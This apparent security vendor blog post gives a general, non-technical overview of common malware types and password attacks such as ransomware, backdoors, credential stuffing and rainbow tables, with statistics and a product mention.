Know Thy Enemy – Most Common Types of Malware & Password Attacks
In the previous posts here, we talked about Main Types of Cyber Threats and Common Types of Cyber Threats with Examples. In this article, we are going to talk about Most Common Types of Malware and Password Threats. Malware and web-based attacks comprise some of the most damaging and expensive attacks with companies spending an average of US $2.4 million in defence. What’s more worrying is that recent data indicates 7 out of every 10 malware payloads were ransomware. With ransomware attacks increasing severely in 2020, this is bound to cause problems for organizations in the future. MacOS malware and mobile malware are on the rise too with the former witnessing an increase by about 165% and 98% of mobile malware targeting Android devices.
Despite the rising risk quotient, password hygiene and effective password management are yet to witness any significant improvement. 90% of internet users are worried about getting their password stolen or hacked. 53% continue to rely on their memory to manage passwords. And most significantly, 57% of people who have already been scammed in phishing attacks still haven’t changed their passwords. If you are worried about password security in your organization, consider implementing zero trust architecture for remote work security.
What is a cyber threat level?
The Cyber Threat Level Indicator helps you assess the current level of malicious cyber activity and estimates the potential/actual damage. The Cyber Threat Level Indicator has five levels of risk.
Cyber Threat Level Indicator
The two extremes of the Cyber Threat Level Indicator are red and green. Red labels show a severe risk of malicious activity that can have widespread negative impact such as system outages and/or permanent system compromises, or a crippling effect on critical infrastructure sectors. Green, on the other hand, shows a low risk or vulnerability to present threat. It generally means that the system cannot detect any unusual activity that may include a potential threat. Cloud Security Solutions offers an effective Cyber Threat Level Indicator to help you accurately assess risks.
What is Malware?
Malware is a general term used for indicating software designed to infiltrate other systems, such as, any programmable device, service or network and cause serious damage to computer systems and data. Malware is typically used for data extraction that can be sold or leveraged by cyber criminals for their own agendas including financial gain. All data is valuable with personally identifiable information, financial data, healthcare records, and credentials often being targeted as the most valuable forms of data.
Types of Malware and spyware attack
Trojans appear and behave as legitimate files or applications in the user system and dupes people into downloading and executing the malware. Trojans are used for causing significant damage to your network or to steal valuable organizational data.
Adware is a type of malware that is used to continuously show unwanted advertisements to unsuspecting users. This kind of malware is more of a nuisance when it comes to using the system and often involves highly distracting advertisements and pop-ups whenever the user tries to execute commands on the system. Users often unwittingly install adware when they try to access programs or services without paying for it.
Ransomware is currently the most common form of attack and involves encrypting files on your device or rendering them inaccessible. Files encrypted using this kind of malware can be decrypted using a key. Criminals tend to demand significant ransom in exchange for not releasing or selling the data and providing the key to decrypt it.
Malicious advertising or malvertising involves embedding malicious code in legitimate advertisements. This kind of attack can take place without the user actually doing anything. Malicious advertising typically involves cybercriminals purchasing legitimate advertising space on legitimate websites, and inserting malicious code within the ad.
Back Door Attacks
Just as the name suggests, a backdoor attack creates the back door into an organization’s network while bypassing normal authentication procedures required to access the system. This enables cyber criminals to remotely access valuable organizational resources, such as databases and file servers, that they can then modify to issue system commands and update malware.
Exploit kits Attacks
These malicious toolkits are used to scan for vulnerabilities on a target’s computer or mobile device. When the kit detects a vulnerability,it exploits the vulnerability to inject malware into the user system. This kind of malware is the reason why security experts insist on implementing software patches as soon as they are made available.
Drive-by downloads Attacks
A drive-by-download is another form of malware that does not require user interaction in order to get executed. These downloads happen automatically when a user visits a malicious website embedded with an exploit kit. The kit quickly assesses the potential vulnerabilities in the browser to inject malware via one.
Fileless malware Attacks
This kind of malicious software makes use of legitimate programs to infect a computer. Fileless malware registry attacks are harder to protect against as this kind of attack leaves no malware files to scan and no malicious processes to detect. This makes it very hard to detect and remove.
Worm attacks are capable of spreading copies of itself from system to system without any need for user interaction. Worm attacks do not even need to be embedded in a software program to be executed.
The Verizon 2019 Data Breaches report found that 29% of all the breaches involved the use of stolen credentials. Recent data suggests that 63% of all organizational internal data breach is a result of compromised usernames and passwords. 65% of companies continue to have over 500 users who have never been asked to change their passwords and 69% of small businesses do not strictly enforce password policies. Data from 2020 indicated that 500,000 stolen Zoom passwords were available for sale in dark web crime forums. The ubiquitous nature of password attacks and phishing attacks have now pushed companies to move towards non-password logins using biometric or other such data for access. Listed below are some of the most common forms of password attacks prevalent today.
Types of Password Attacks
Brute-force password guessing Attacks
This kind of password attack involves malicious actors making numerous automated attempts at guessing the password to gain access. Trying all possible letter-number variations takes time. This makes it necessary for hackers to use criteria to shorten the list of odds. This can involve trying with common or short passwords or using a list of provider-specific criteria (like the minimum number of characters accepted).
A dictionary attack makes use of commonly used words and phrases, and often-used passwords. Malicious actors often try to Metal down the scope of potential passwords with commonly used names of pets, movie characters and people. They could also try variants with numbers and special characters to try and force their way to the correct password.
Keylogger attacks make use of spyware that log the user’s keyboard strokes. This kind of attack is commonly used for stealing anything from passwords to credit card numbers. Keylogger attacks don’t just record the username and password but also make a note of the website where the credentials are used. These can be deployed using either hardware or software. Software keyloggers are more common as users can easily be manipulated to click on a link that contains the spyware. Keyloggers can also form a package with software downloaded from the Internet.
Credential Stuffing Attacks
Credential stuffing exploits an unfortunately popular user behavior, i.e. using the same password for multiple accounts across websites. This kind of attack also capitalizes on the fact that past breaches have already compromised an astounding number of credentials. Keep in mind that a single breach at a major provider (business/ service) can result in a compromise of millions of credentials. Credential stuffing attacks use the stolen passwords to check to see if any of them are still active on particular websites. This kind of attack also employs automation techniques that makes it incredibly effective.
Traffic Interception Attacks
Traffic interception, a variation on the man-in-the-middle attack, involves the threat actors eavesdropping on network traffic to monitor and capture data. A common way of doing that is through unsecured Wi-Fi connections or connections that don’t use encryption, such as HTTP. Even SSL traffic is vulnerable. For example, a hacker can use a man-in-the-middle attack in what’s called SSL hijacking. SSL hijacking is when someone tries to connect to a secure website, and the attacker creates a bridge of sorts between the user and the intended destination and intercepts any information passing between the two, such as passwords.
Password Spraying Attacks
Password spraying attacks typically make use of a hit or miss approach in using a variety of common passwords on a small number of user accounts. This kind of attack is very popular in targeting single sign-on or cloud-based accounts. This kind of attack takes a lot of caution as multiple failed login attempts can lock the account the hackers are trying to access. This is achieved through distributing all login attempts across multiple users and organizations.
Rainbow Table Attacks
Login credentials of users are automatically hashed on most websites. Hashing is the process that converts and encrypts passwords to a set of cryptographic sequences of characters that are stored on the website’s database. From then on, every time that the user tries to logon to the system, the entered credentials are hashed and matched with those stored in the database. Rainbow table attacks are similar to dictionary attacks but make use of a rainbow table with pre-computed hash functions and their hashed values. This enables hackers to compare values against this table and use them to decrypt the passwords in the company database. Rainbow tables for common hashing algorithms are available on the dark web, or can be created with hacking tools like Rainbow Crack and Ophcrack.